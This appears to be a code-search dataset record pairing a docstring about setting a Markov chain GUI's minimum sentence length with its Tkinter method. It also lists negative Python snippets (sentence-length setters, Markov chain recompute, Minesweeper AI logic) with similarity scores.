"def setNumThreads(cls, numThreads: int):\n cls.NUMTHREADS = numThreads",
"def set_max_sentence_length(self):\n new_max = int(self.set_max_sentence.get())\n cur_min = self.min_sentence_length\n\n if new_max > cur_min:\n self.max_sentence_length = new_max\n else:\n old_max = self.max_sentence_length\n old_max_var = tk.StringVar(self.master)\n old_max_var.set(str(old_max))\n self.set_max_sentence.config(textvariable=old_max_var)",
"def setSplitCount(self, count):\n pass",
"def setMancount(self, cnt):\n self.__mancount=cnt",
"def set_Count(self, value):\n super(MoneyReceivedInputSet, self)._set_input('Count', value)",
"def number_of_pages(self, number_of_pages):\n self._number_of_pages = number_of_pages",
"def num_slots(self, num_slots):\n\n self._num_slots = num_slots",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)"
] |
[
"0.65060955",
"0.61695755",
"0.59748507",
"0.5911244",
"0.58793664",
"0.5843372",
"0.5841032",
"0.58173054",
"0.5584266",
"0.55234367",
"0.549743",
"0.5469665",
"0.5469665",
"0.54437494",
"0.54421407",
"0.5417",
"0.5392903",
"0.53676283",
"0.5358095",
"0.5322339",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636",
"0.53115636"
] |
0.87004405
|
0
|
Sets the minimum sentence length of any sentence this GUI's Markov Chain will output, as per the current value of the set_min_sentence SpinBox. If the current value is greater than or equal to the current maximum sentence length, no change is made.
|
def set_min_sentence_length(self):
new_min = int(self.set_min_sentence.get())
cur_max = self.max_sentence_length
if new_min < cur_max:
self.min_sentence_length = new_min
else:
old_min = self.min_sentence_length
old_min_var = tk.StringVar(self.master)
old_min_var.set(str(old_min))
self.set_min_sentence.config(textvariable=old_min_var)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def setMinSentenceSize(self, value):\n return self._set(minSentenceSize=value)",
"def set_max_sentence_length(self):\n new_max = int(self.set_max_sentence.get())\n cur_min = self.min_sentence_length\n\n if new_max > cur_min:\n self.max_sentence_length = new_max\n else:\n old_max = self.max_sentence_length\n old_max_var = tk.StringVar(self.master)\n old_max_var.set(str(old_max))\n self.set_max_sentence.config(textvariable=old_max_var)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceSize(self, value):\n return self._set(maxSentenceSize=value)",
"def _set_minimum(self):\n self._level_gen.minimum_length = self._minimum_length_spinbox.value()\n self._refresh_view()",
"def setMaxSentenceLength(self, maxSentenceLength):\n return self._set(maxSentenceLength=maxSentenceLength)",
"def setMaxSentenceLength(self, maxSentenceLength):\n return self._set(maxSentenceLength=maxSentenceLength)"
] |
[
"0.7855158",
"0.76631397",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.6884778",
"0.68452406",
"0.6352008",
"0.634724",
"0.634724"
] |
0.87098616
|
0
|
Sets the maximum sentence length of any sentence this GUI's Markov Chain will output, as per the current value of the set_max_sentence SpinBox. If the current value is less than or equal to the current minimum sentence length, no change is made.
|
def set_max_sentence_length(self):
new_max = int(self.set_max_sentence.get())
cur_min = self.min_sentence_length
if new_max > cur_min:
self.max_sentence_length = new_max
else:
old_max = self.max_sentence_length
old_max_var = tk.StringVar(self.master)
old_max_var.set(str(old_max))
self.set_max_sentence.config(textvariable=old_max_var)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceLength(self, value):\n return self._set(maxSentenceLength=value)",
"def setMaxSentenceSize(self, value):\n return self._set(maxSentenceSize=value)",
"def setMaxSentenceLength(self, maxSentenceLength):\n return self._set(maxSentenceLength=maxSentenceLength)",
"def setMaxSentenceLength(self, maxSentenceLength):\n return self._set(maxSentenceLength=maxSentenceLength)",
"def set_min_sentence_length(self):\n new_min = int(self.set_min_sentence.get())\n cur_max = self.max_sentence_length\n\n if new_min < cur_max:\n self.min_sentence_length = new_min\n else:\n old_min = self.min_sentence_length\n old_min_var = tk.StringVar(self.master)\n old_min_var.set(str(old_min))\n self.set_min_sentence.config(textvariable=old_min_var)",
"def _set_maximum(self):\n self._level_gen.maximum_length = self._maximum_length_spinbox.value()\n self._refresh_view()",
"def setMinSentenceSize(self, value):\n return self._set(minSentenceSize=value)"
] |
[
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.8061239",
"0.80122334",
"0.7877077",
"0.7877077",
"0.7576211",
"0.6728245",
"0.65178245"
] |
0.8767241
|
0
|
Recomputes this GUI's Markov Chain if the desired order is changed from the current order, as per the value of the order_selection SpinBox component.
|
def recompute_markov_chain(self):
new_order = int(self.order_selection.get())
if new_order != self.markov_chain.order:
self.markov_chain.recompute_markov_chain(new_order)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def changeOrder(self):\n order = self.orderSpinBox.value()\n nfilter = int(str(self.filterComboBox.currentText()))\n if order > nfilter - 2:\n order = nfilter - 2\n if order < 1:\n order = 1\n self.orderSpinBox.setValue(order)\n self.order = order",
"def View_Preorder( self ):\r\n cb.order = 0\r\n self.system.Draw( )",
"def View_Inorder( self ):\r\n cb.order = 1\r\n self.system.Draw( )",
"def update_normalization_order(self):\n self._cache[\"input\"][\"order\"] = int(self.order.currentText())\n self.reset_input_style_defaults()\n self.fit_continuum(True)\n self.draw_continuum(True)\n return None",
"def check_for_different_input_settings(self):\n\n session, index = self.parent.session, self.current_order_index\n\n # Is there continuum already for this new order?\n continuum = session.metadata[\"normalization\"][\"continuum\"][index]\n normalization_kwargs \\\n = session.metadata[\"normalization\"][\"normalization_kwargs\"][index]\n\n # These keys don't have widgets, but need to be updated.\n extra_keys = (\"additional_points\", \"exclude\")\n for key in extra_keys:\n if key in normalization_kwargs:\n self._cache[\"input\"][key] = normalization_kwargs[key]\n elif key in self._cache[\"input\"]:\n del self._cache[\"input\"][key]\n\n if continuum is None: return\n\n # If so, are the current normalization keywords different to the ones\n # used for this one?\n input_items = {\n \"function\": [self.function_label, self.function],\n \"order\": [self.order_label, self.order],\n \"max_iterations\": [self.max_iter_label, self.norm_max_iter],\n \"low_sigma_clip\": [self.low_sigma_clip_label, self.low_sigma_clip],\n \"high_sigma_clip\": \\\n [self.high_sigma_clip_label, self.high_sigma_clip],\n \"knot_spacing\": [self.knot_spacing, self.knot_spacing_label],\n }\n\n diff = dict_updated(self._cache[\"input\"], normalization_kwargs,\n exclude=(\"additional_points\", \"exclude\"))\n\n # By default, everything should be styled normally.\n self.reset_input_style_defaults(sum(input_items.values(), []))\n for key, (current, used) in diff.items():\n if key in input_items:\n # Update the font-weight of those objects.\n items = input_items[key]\n for item in items:\n item.setStyleSheet(\"{0} {{ font-weight: bold }}\".format(\n item.__class__.__name__))\n item.setStatusTip(\"Order {0} was normalized using {1} =\"\n \" {2} (not {3})\"\\\n .format(1 + index, key, used, current))\n\n \n return None",
"def update_continuum_order_2(self):\n self._get_selected_model().metadata[\"continuum_order\"] \\\n = int(self.combo_continuum_2.currentText())\n return None",
"def update_order():",
"def update_order():",
"def update_continuum_order(self):\n self._get_selected_model().metadata[\"continuum_order\"] \\\n = int(self.combo_continuum.currentText())\n return None",
"def View_Postorder( self ):\r\n cb.order = 2\r\n self.system.Draw( )",
"def change_order(self):\n if self.controller.shared_data.obj_track.size == 0:\n message = 'There is no loaded track to change order'\n messagebox.showwarning(title='Insert Time Assistant',\n message=message)\n return\n\n self.timestamp = dt.datetime(2000, 1, 1, 0, 0, 0)\n self.speed = 0\n\n top = tk.Toplevel()\n top.title('Change Segment Order Assistant')\n\n # Insert data frame\n frm_form = tk.Frame(top, relief=tk.FLAT, borderwidth=3)\n frm_form.pack() # insert frame to use grid on it\n spn_seg = collections.defaultdict()\n\n available_segments = \\\n self.controller.shared_data.obj_track.df_track.segment.unique()\n\n for i, entry in enumerate(available_segments):\n # This allow resize the window\n top.columnconfigure(i, weight=1, minsize=75)\n top.rowconfigure(i, weight=1, minsize=50)\n\n # Create widgets\n var = tk.StringVar(top)\n var.set(i + 1)\n color = utils.rgb2hexcolor(\n utils.color_rgb(plots.COLOR_LIST[(entry - 1) % plots.N_COLOR]))\n\n spn_seg[entry] = tk.Spinbox(from_=1,\n to=99,\n master=frm_form,\n width=8,\n textvariable=var,\n justify=tk.RIGHT,\n relief=tk.FLAT)\n\n lbl_label = tk.Label(master=frm_form, text=f'{entry}', anchor='w',\n width=6,\n height=1,\n relief=tk.FLAT,\n justify=tk.CENTER,\n bg=color)\n\n # Grid\n lbl_label.grid(row=i, column=0) # grid attached to frame\n spn_seg[entry].grid(row=i, column=1)\n\n # Button frame\n frm_button = tk.Frame(top)\n frm_button.pack(fill=tk.X, padx=5,\n pady=5) # fill in horizontal direction\n\n def _clear_box():\n for j, s in enumerate(spn_seg):\n spn_seg[s].delete(0, 8)\n spn_seg[s].insert(0, j + 1)\n\n def _insert_order():\n\n # Check valid order\n new_order = {}\n for _entry in available_segments:\n new_order[_entry] = int(spn_seg[_entry].get())\n\n if len(set(new_order)) != len(available_segments):\n messagebox.showerror('Warning',\n 'Invalid order. Repeated index.')\n elif max(new_order, key=int) != max(available_segments) or \\\n min(new_order, key=int) != min(available_segments):\n messagebox.showerror('Warning',\n 'Invalid order. Bad max/min index.')\n else:\n self.controller.shared_data.obj_track.change_order(new_order)\n top.destroy()\n\n plots.update_plots(\n self.controller.shared_data.obj_track,\n self.controller.shared_data.ax_track,\n self.controller.shared_data.ax_ele,\n self.controller.shared_data.ax_track_info,\n canvas=self.controller.shared_data.canvas)\n\n self.controller.shared_data.canvas.draw()\n\n btn_clear = tk.Button(master=frm_button, text='Clear',\n command=_clear_box)\n btn_submit = tk.Button(master=frm_button, text='Submit',\n command=_insert_order)\n btn_clear.pack(side=tk.RIGHT, padx=10)\n btn_submit.pack(side=tk.RIGHT, padx=10)",
"def on_order(self, order: OrderData):\n self.position_calculator.update_position(order)\n\n self.current_pos = self.position_calculator.pos\n self.avg_price = self.position_calculator.avg_price\n\n if order.status == Status.ALLTRADED and order.vt_orderid in (self.long_orders + self.short_orders):\n\n if order.vt_orderid in self.long_orders:\n self.long_orders.remove(order.vt_orderid)\n\n if order.vt_orderid in self.short_orders:\n self.short_orders.remove(order.vt_orderid)\n\n self.last_filled_order = order\n\n for ids in (self.long_orders + self.short_orders + self.profit_orders):\n self.cancel_order(ids)\n\n if abs(self.position_calculator.pos) < self.fixed_size:\n return\n\n step = self.get_step()\n\n # tick 存在且仓位数量还没有达到设置的最大值.\n if self.tick and abs(self.position_calculator.pos) < self.max_pos_size * self.fixed_size:\n buy_price = order.price - step * self.grid_step\n sell_price = order.price + step * self.grid_step\n\n buy_price = min(self.tick.bid_price_1 * (1 - 0.0001), buy_price)\n sell_price = max(self.tick.ask_price_1 * (1 + 0.0001), sell_price)\n\n long_ids = self.buy(buy_price, self.fixed_size)\n short_ids = self.sell(sell_price, self.fixed_size)\n\n self.long_orders.extend(long_ids)\n self.short_orders.extend(short_ids)\n\n if order.status == Status.ALLTRADED and order.vt_orderid in self.profit_orders:\n self.profit_orders.remove(order.vt_orderid)\n if abs(self.position_calculator.pos) < self.fixed_size:\n self.cancel_all()\n\n if not order.is_active():\n if order.vt_orderid in self.long_orders:\n self.long_orders.remove(order.vt_orderid)\n\n elif order.vt_orderid in self.short_orders:\n self.short_orders.remove(order.vt_orderid)\n\n elif order.vt_orderid in self.profit_orders:\n self.profit_orders.remove(order.vt_orderid)\n\n elif order.vt_orderid in self.stop_orders:\n self.stop_orders.remove(order.vt_orderid)\n\n self.put_event()",
"def update_order_index(self, index=None):\n if index is None:\n index = getattr(self, \"current_order_index\", 0)\n\n session = self.parent.session\n self.current_order_index = index\n self.current_order \\\n = session.input_spectra[self.current_order_index].copy()\n\n # Apply any RV correction.\n try:\n v = session.metadata[\"rv\"][\"rv_applied\"]\n except (AttributeError, KeyError):\n v = 0\n\n self.current_order._dispersion *= (1 - v/c)\n\n # Update the view if the input settings don't match the settings used\n # to normalize the current order.\n self.check_for_different_input_settings()\n\n return None",
"def reorder(self, new_order):\n #TODO doesn't work probably CRA 3/2019\n for field in [\"atoms\", \"xyz\"]:\n self.__dict__[field] = self.__dict__[field][list(new_order)]\n self.atoms = [self.atoms[i] for i in new_order]",
"def SetOrder(self, order):\n if self.__order != order:\n self.__order = order\n self.Modified()",
"def clicked_checkbox_continuum_2(self):\n if self.checkbox_continuum_2.isChecked():\n self.combo_continuum_2.setEnabled(True)\n self.update_continuum_order()\n self.edit_manual_continuum.setEnabled(False)\n else:\n self._get_selected_model().metadata[\"continuum_order\"] = -1\n self.combo_continuum_2.setEnabled(False)\n self.edit_manual_continuum.setEnabled(True)\n return None",
"def _ensure_order_consistent(self):\r\n if self.order_sum() != self.order_triangle() or \\\r\n self.force_reset_order is True:\r\n self._reset_order()\r\n self._have_reset_order = True\r\n else:\r\n self._have_reset_order = False\r\n return self._have_reset_order",
"def set_order(self, order):\n self.order = order",
"def set_order(self, order):\n self.order = order",
"def setOrder(self, verbose = 1):\n\n self.order = np.arange(self.atoms.shape[0])\n if verbose > 0:\n string = \"Updated the saved order\"\n ut.infoPrint(string)",
"def onOrderSelected(self, item):\n if self.lstOrders.getMultiSelectedItems() == []:\n self.clearBidData()\n else:\n self.btnCancelOrder.enable()",
"def check_fit_gui(wls,fxc,trans):\n\n\n import sys\n import matplotlib.pyplot as plt\n from matplotlib.widgets import Slider, Button, RadioButtons, CheckButtons\n import lib.functions as fun\n import numpy as np\n\n M = molecfit_gui(wls,fxc,trans)\n\n #The slider to cycle through orders:\n rax_slider = plt.axes([0.8, 0.2, 0.1, 0.02])\n rax_slider.set_title('Order')\n M.spectrum_slider = Slider(rax_slider,'', 0,M.N-1,valinit=0,valstep=1)#Store the slider in the model class\n M.spectrum_slider.on_changed(M.slide_spectrum)\n\n #The Previous order button:\n rax_prev = plt.axes([0.8, 0.1, 0.04, 0.05])\n bprev = Button(rax_prev, ' <<< ')\n bprev.on_clicked(M.previous)\n\n #The Next order button:\n rax_next = plt.axes([0.86, 0.1, 0.04, 0.05])\n bnext = Button(rax_next, ' >>> ')\n bnext.on_clicked(M.next)\n\n #The save button:\n rax_save = plt.axes([0.92, 0.1, 0.07, 0.05])\n bsave = Button(rax_save, 'Continue')\n bsave.on_clicked(M.save)\n\n #The cancel button:\n rax_cancel = plt.axes([0.92, 0.025, 0.07, 0.05])\n bcancel = Button(rax_cancel, 'Cancel')\n bcancel.on_clicked(M.cancel)\n\n #This is to rescale the x-size of the checkboxes so that they are squares.\n bbox = M.fig.get_window_extent().transformed(M.fig.dpi_scale_trans.inverted())\n width, height = bbox.width*M.fig.dpi, bbox.height*M.fig.dpi\n\n\n M.selec=plt.axes([0.05,0.03,0.7,0.05*M.nrows])\n M.selec.spines['bottom'].set_color('white')\n M.selec.spines['top'].set_color('white')\n M.selec.spines['left'].set_color('white')\n M.selec.spines['right'].set_color('white')\n vlines = fun.findgen(M.N-1)+0.5\n\n row = M.nrows\n offset = 0\n for i in range(M.N):\n #print(i,float(i)-offset)\n\n if float(i)-offset > M.maxboxes-1.0:\n row -= 1\n offset += M.maxboxes\n M.selec.plot(float(i)-offset+np.array([-0.5,-0.5,0.5,0.5,-0.5]),[row,row-1,row-1,row,row],color='black')\n M.selec.text(float(i)-offset,row-0.5,'%s' % i,color='black',horizontalalignment='center',verticalalignment='center')\n\n\n\n M.selec.set_xlim(-0.55,M.maxboxes-1.0+0.55)#A little margin to make sure that the line thickness is included.\n M.selec.set_ylim(-0.05,1.0*M.nrows+0.05)\n #M.selec.set_yticklabels([])\n M.selec.xaxis.set_tick_params(labelsize=8)\n M.selec.yaxis.set_tick_params(labelsize=8)\n\n\n\n def select_spectrum_box(event):\n\n #This handles with a mouseclick in either of the three plots while in add mode.\n if event.inaxes in [M.selec]:#Check that it occurs in one of the subplots.\n cc = event.xdata*1.0#xdata is the column that is selected.\n cr = event.ydata*1.0\n spectrum = np.round(cc)+np.round((M.nrows-cr-0.5))*M.maxboxes\n if spectrum < M.N:\n if spectrum in M.selected:\n M.selected.remove(spectrum)\n print('---Removed spectrum %s from manual' % spectrum)\n else:\n M.selected.append(spectrum)\n print('---Added spectrum %s to manual' % spectrum)\n M.draw_crosses()\n M.click_connector = M.fig.canvas.mpl_connect('button_press_event',select_spectrum_box)#This is the connector that registers clicks\n\n plt.show()\n print('Closed GUI, returning.')\n return(M.selected)",
"def on_order(self, order: OrderData):\n\n if order.vt_orderid not in (self.short_orders + self.long_orders):\n return\n\n self.pos_calculator.update_position(order)\n\n self.current_pos = self.pos_calculator.pos\n self.avg_price = self.pos_calculator.avg_price\n\n if order.status == Status.ALLTRADED:\n\n if order.vt_orderid in self.long_orders:\n self.long_orders.remove(order.vt_orderid)\n self.trade_count += 1\n\n short_price = order.price + self.step_price\n if short_price <= self.high_price:\n orders = self.short(short_price, self.order_volume)\n self.short_orders.extend(orders)\n\n if len(self.long_orders) < self.max_open_orders:\n long_price = order.price - self.step_price * self.max_open_orders\n if long_price >= self.low_price:\n orders = self.buy(long_price, self.order_volume)\n self.long_orders.extend(orders)\n\n if order.vt_orderid in self.short_orders:\n self.short_orders.remove(order.vt_orderid)\n self.trade_count += 1\n long_price = order.price - self.step_price\n if long_price >= self.low_price:\n orders = self.buy(long_price, self.order_volume)\n self.long_orders.extend(orders)\n\n if len(self.short_orders) < self.max_open_orders:\n short_price = order.price + self.step_price * self.max_open_orders\n if short_price <= self.high_price:\n orders = self.short(short_price, self.order_volume)\n self.short_orders.extend(orders)\n\n if not order.is_active():\n if order.vt_orderid in self.long_orders:\n self.long_orders.remove(order.vt_orderid)\n\n elif order.vt_orderid in self.short_orders:\n self.short_orders.remove(order.vt_orderid)\n\n self.put_event()",
"def on_increased_position(self, order) -> None:\n pass",
"def order_information(self):\n info_ordering = MeldaInfoOrdering(self.args, self.content_selector.selected_content)\n self.content_selector.selected_content = info_ordering.run_cohesion_gradient(self.documents)",
"def clicked_checkbox_continuum(self):\n if self.checkbox_continuum.isChecked():\n self.combo_continuum.setEnabled(True)\n self.update_continuum_order()\n else:\n self._get_selected_model().metadata[\"continuum_order\"] = -1\n self.combo_continuum.setEnabled(False)\n return None",
"def setOrder(self, order):\n\t\tself.orderInData = order",
"def order(self, order):\n self._order = order",
"def calculate(self, order):\n pass",
"def change(self):\r\n\r\n # If checkboxes are available, check status and set boat speed reference line visibility accordingly.\r\n if self.cb:\r\n if self.cb_bt.checkState() == QtCore.Qt.Checked:\r\n for item in self.bt:\r\n item.set_visible(True)\r\n else:\r\n for item in self.bt:\r\n item.set_visible(False)\r\n # GGA\r\n if self.cb_gga.checkState() == QtCore.Qt.Checked:\r\n for item in self.gga:\r\n item.set_visible(True)\r\n # self.gga[0].set_visible(True)\r\n elif self.gga is not None:\r\n for item in self.gga:\r\n item.set_visible(False)\r\n # self.gga[0].set_visible(False)\r\n # VTG\r\n if self.cb_vtg.checkState() == QtCore.Qt.Checked:\r\n for item in self.vtg:\r\n item.set_visible(True)\r\n # self.vtg[0].set_visible(True)\r\n elif self.vtg is not None:\r\n for item in self.vtg:\r\n item.set_visible(False)\r\n # self.vtg[0].set_visible(False)\r\n\r\n # Draw canvas\r\n self.canvas.draw()"
] |
[
"0.6389229",
"0.58652914",
"0.5861863",
"0.5853997",
"0.5796275",
"0.5780696",
"0.5687923",
"0.5687923",
"0.55883986",
"0.5557497",
"0.55573565",
"0.55556",
"0.52876484",
"0.52418035",
"0.5234506",
"0.5224273",
"0.52146053",
"0.517181",
"0.517181",
"0.5164182",
"0.51192427",
"0.511682",
"0.51103604",
"0.5099788",
"0.5056568",
"0.5051751",
"0.5043224",
"0.50050855",
"0.5001655",
"0.49936745"
] |
0.78417915
|
0
|
Has this GUI's Markov Chain recompute itself to work with whole words.
|
def set_markov_chain_to_words(self):
self.markov_chain.recompute_markov_chain_with_words()
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def recompute_markov_chain(self):\n new_order = int(self.order_selection.get())\n if new_order != self.markov_chain.order:\n self.markov_chain.recompute_markov_chain(new_order)",
"def set_markov_chain_to_chars(self):\n self.markov_chain.recompute_markov_chain_with_chars()",
"def knowledge_refresh(self):\n knowledge_len = len(self.knowledge)\n for i, sentence in enumerate(deepcopy(self.knowledge)):\n if sentence.cells != set():\n for j in range(i+1, knowledge_len):\n if self.knowledge[j].cells != set() and sentence.cells != self.knowledge[j].cells:\n if sentence.cells.issubset(self.knowledge[j].cells):\n new_set = self.knowledge[j].cells.difference(sentence.cells)\n new_count = self.knowledge[j].count - sentence.count\n if new_set != set():\n new_sentence = Sentence(cells=new_set, count=new_count)\n if not new_sentence in self.knowledge:\n self.knowledge.append(new_sentence)\n\n elif self.knowledge[j].cells.issubset(sentence.cells):\n new_set = sentence.cells.difference(self.knowledge[j].cells)\n new_count = sentence.count - self.knowledge[j].count\n if new_set != set():\n new_sentence = Sentence(cells=new_set, count=new_count)\n if not new_sentence in self.knowledge:\n self.knowledge.append(new_sentence)\n \n # remove unnecessery knowledge\n if sentence.cells == set() and sentence.known_mines() == set() and sentence.known_safes() == set():\n self.knowledge.remove(sentence)",
"def get_words(self):\n wordlist = self.words_box.get().split()\n for word in wordlist:\n self.words[word] = False\n self.logic.set_words_to_find(self.words)",
"def add_knowledge(self, cell, count):\n self.moves_made.add(cell)\n self.mark_safe(cell)\n cells=set()\n #print(\"yo\")\n for i in range(cell[0]-1, cell[0]+2):\n for j in range(cell[1]-1, cell[1]+2):\n if i>=0 and j>=0 and i<self.height and j<self.width:\n if (i,j)==cell:\n continue\n if (i,j) in self.mines:\n count=count-1\n\n elif (i,j) not in self.safes and (i,j) not in self.moves_made:\n cells.add((i,j))\n\n a=Sentence(cells, count)\n r=len(self.knowledge)\n #print(\"go\")\n '''Ignore this code\n while i<r:\n if self.knowledge[i].getcells().issubset(a.cells):\n #self.knowledge.append(Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount()))\n a=Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount())\n if cells.issubset(self.knowledge[i].getcells()):\n self.knowledge[i]=Sentence(self.knowledge[i].getcells()-cells, self.knowledge[i].getcount()-count)\n i+=1\n '''\n self.knowledge.append(a)\n #print(\"no\")\n r=range(len(self.knowledge))\n i=0\n while i<len(self.knowledge):\n if (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_safes()):\n self.mark_safe(cell)\n self.knowledge.pop(i)\n elif (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_mines()):\n self.mark_mine(cell)\n self.knowledge.pop(i)\n else: \n i=i+1\n\n r=range(len(self.knowledge))\n\n for i in r:\n for j in range(i+1, len(self.knowledge)):\n if self.knowledge[i].getcells().issubset(self.knowledge[j].getcells()):\n #self.knowledge.append(Sentence(cells-self.knowledge[i].getcells(), count-self.knowledge[i].getcount()))\n self.knowledge[j]=Sentence(self.knowledge[j].getcells()-self.knowledge[i].getcells(), self.knowledge[j].getcount()-self.knowledge[i].getcount())\n elif self.knowledge[j].getcells().issubset(self.knowledge[i].getcells()):\n self.knowledge[i]=Sentence(self.knowledge[i].getcells()-self.knowledge[j].getcells(), self.knowledge[i].getcount()-self.knowledge[j].getcount())\n\n i=0\n while i<len(self.knowledge):\n if (self.knowledge[i].known_safes()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_safes()):\n self.mark_safe(cell)\n self.knowledge.pop(i)\n elif (self.knowledge[i].known_mines()!=set()):\n for cell in copy.deepcopy(self.knowledge[i].known_mines()):\n self.mark_mine(cell)\n self.knowledge.pop(i)\n else: \n i=i+1\n\n #print(\"mines\",len(self.mines))\n \n #raise NotImplementedError",
"def reveal(self):\n self._words_guessed = self._words",
"def lemmatize_fun(self):\n tokens = str(self.doc).split()\n cleaned_tokens = None\n if self.lemmatize_method == 'wordnet':\n cleaned_tokens = [self.lemmatizer.lemmatize(token) for token in tokens]\n else:\n cleaned_tokens = [self.lemmatizer.stem(token) for token in tokens]\n \n self.doc = ' '.join(cleaned_tokens)",
"def add_knowledge(self, cell, count):\n # First, just update some basic information\n self.moves_made.add(cell)\n self.mark_safe(cell)\n # Getting the neighbouring cells\n cells = set([])\n for i in range(cell[0] - 1, cell[0] + 2):\n for j in range(cell[1] - 1, cell[1] + 2):\n\n # Ignore the cell itself\n if (i, j) == cell:\n continue\n\n # Update count if cell in bounds and is mine\n if 0 <= i < self.height and 0 <= j < self.width:\n cells.add((i,j))\n # Make sure to eliminate the known safes\n sentence = Sentence(cells - self.safes, count)\n # As well as the known mines\n for mine in self.mines:\n sentence.mark_mine(mine)\n\n # Then the knowledge base is updated\n self.knowledge.append(sentence)\n #for sentence in self.knowledge:\n #print(sentence)\n\n # Now I update the ai's knowledge until no new knowledge is made\n # First I'll check if the sentence is empty, and remove if it is\n count = 1\n # Repeat until no new changes\n while count:\n count = 0\n to_be_removed = set()\n # update any known safes or mines\n self.check_all_mines_safes()\n # Compare every pair of sentence in 